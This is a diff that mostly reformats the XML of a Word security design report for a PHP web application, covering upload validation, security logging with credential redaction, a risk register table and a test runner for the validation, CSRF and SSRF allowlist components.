-        </w:rPr>
-        <w:t>finfo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>) rather than trusting the client-supplied Content-Type or file extension, stored under a random filename outside the web root, and capped at 5 MB.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:t>File uploads are validated by sniffing actual file content (finfo) rather than trusting the client-supplied Content-Type or file extension, stored under a random filename outside the web root, and capped at 5 MB.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
         <w:spacing w:before="240" w:after="120"/>
       </w:pPr>
       <w:r>
@@ -5271,52 +3938,16 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">Failed logins, account lockouts, denied authorization attempts, rejected input, CSRF rejections, and blocked SSRF attempts are all recorded through a single </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Logger::</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">log() call, written both to an append-only JSON-lines file (storage/logs/security.log) and mirrored into a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>security_events</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> database table for SQL-based querying. The logger defensively strips any password/token/secret key before writing, so a caller mistake cannot leak a credential into the log:</w:t>
+        <w:t>Failed logins, account lockouts, denied authorization attempts, rejected input, CSRF rejections, and blocked SSRF attempts are all recorded through a single Logger::log() call, written both to an append-only JSON-lines file (storage/logs/security.log) and mirrored into a security_events database table for SQL-based querying. The logger defensively strips any password/token/secret key before writing, so a caller mistake cannot leak a credential into the log:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
+          <w:top w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:left w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:bottom w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
+          <w:right w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
         </w:pBdr>
         <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
         <w:spacing w:before="100" w:after="200"/>
@@ -5327,44 +3958,15 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:br/>
-        <w:t>private const REDACT_KEYS = ['password', '</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>password_confirm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>', 'token', '</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>raw_token</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Consolas"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>', 'secret'];</w:t>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>private const REDACT_KEYS = ['password', 'password_confirm', 'token', 'raw_token', 'secret'];</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5377,43 +3979,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>A sample of redacted log entries (fictitious data) is provided in docs/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>sample_logs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>security.log.sample</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and discussed further in Section 7.</w:t>
+        <w:t>A sample of redacted log entries (fictitious data) is provided in docs/sample_logs/security.log.sample and discussed further in Section 7.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5423,11 +3989,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="2"/>
         <w:spacing w:before="320" w:after="160"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>6. Risk Register</w:t>
       </w:r>
     </w:p>
@@ -5446,20 +4011,24 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
+        <w:tblStyle w:val="9"/>
         <w:tblW w:w="10500" w:type="dxa"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
         <w:tblBorders>
-          <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
         </w:tblBorders>
+        <w:tblLayout w:type="autofit"/>
         <w:tblCellMar>
+          <w:top w:w="0" w:type="dxa"/>
           <w:left w:w="10" w:type="dxa"/>
+          <w:bottom w:w="0" w:type="dxa"/>
           <w:right w:w="10" w:type="dxa"/>
         </w:tblCellMar>
-        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
       </w:tblPr>
       <w:tblGrid>
         <w:gridCol w:w="700"/>
@@ -5470,6 +4039,22 @@
         <w:gridCol w:w="1600"/>
       </w:tblGrid>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:trPr>
           <w:tblHeader/>
         </w:trPr>
@@ -5517,7 +4102,6 @@
             <w:shd w:val="clear" w:color="auto" w:fill="1A3D6D"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:eastAsia="Calibri"/>
@@ -5527,9 +4111,16 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t>Pre L</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t>Pre L×I</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3200" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="1A3D6D"/>
+          </w:tcPr>
+          <w:p>
             <w:r>
               <w:rPr>
                 <w:rFonts w:eastAsia="Calibri"/>
@@ -5539,13 +4130,13 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t>×I</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3200" w:type="dxa"/>
+              <w:t>Mitigation</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1100" w:type="dxa"/>
             <w:shd w:val="clear" w:color="auto" w:fill="1A3D6D"/>
           </w:tcPr>
           <w:p>
@@ -5558,13 +4149,13 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t>Mitigation</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1100" w:type="dxa"/>
+              <w:t>Post L×I</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1600" w:type="dxa"/>
             <w:shd w:val="clear" w:color="auto" w:fill="1A3D6D"/>
           </w:tcPr>
           <w:p>
@@ -5577,31 +4168,28 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t>Post L×I</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1600" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="1A3D6D"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:eastAsia="Calibri"/>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="FFFFFF"/>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
               <w:t>Status</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="700" w:type="dxa"/>
@@ -5706,6 +4294,22 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="700" w:type="dxa"/>
@@ -5810,6 +4414,22 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="700" w:type="dxa"/>
@@ -5914,6 +4534,22 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="700" w:type="dxa"/>
@@ -6018,6 +4654,22 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="700" w:type="dxa"/>
@@ -6122,6 +4774,22 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="700" w:type="dxa"/>
@@ -6226,6 +4894,22 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="700" w:type="dxa"/>
@@ -6330,6 +5014,22 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="700" w:type="dxa"/>
@@ -6434,6 +5134,22 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="700" w:type="dxa"/>
@@ -6538,6 +5254,22 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="700" w:type="dxa"/>
@@ -6642,6 +5374,22 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="700" w:type="dxa"/>
@@ -6746,6 +5494,22 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="700" w:type="dxa"/>
@@ -6850,6 +5614,22 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="700" w:type="dxa"/>
@@ -6954,6 +5734,22 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblBorders>
+            <w:top w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:left w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:right w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideH w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+            <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
+          </w:tblBorders>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="10" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="10" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="700" w:type="dxa"/>
@@ -7083,17 +5879,16 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="2"/>
         <w:spacing w:before="320" w:after="160"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>7. Testing and Evidence</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="3"/>
         <w:spacing w:before="240" w:after="120"/>
       </w:pPr>
       <w:r>
@@ -7110,116 +5905,16 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>A dependency-free PHP test runner (tests/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>run_tests.php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>) exercises the pure-logic components without needing a live database: input validation (Validator), password hashing round-trips (</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Auth::</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>hashPassword</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> / </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>password_verify</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>), CSRF token generation/verification/tamper-rejection (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Csrf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>), and the SSRF allowlist decision logic (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>UrlGuard</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>). It is invoked with:</w:t>
+        <w:t>A dependency-free PHP test runner (tests/run_tests.php) exercises the pure-logic components without needing a live database: input validation (Validator), password hashing round-trips (Auth::hashPassword / password_verify), CSRF token generation/verification/tamper-rejection (Csrf), and the SSRF allowlist decision logic (UrlGuard). It is invoked with:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
-          <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
+          <w:top w:val="single" w:color="CCCCCC" w:sz="2" w:space="0"/>
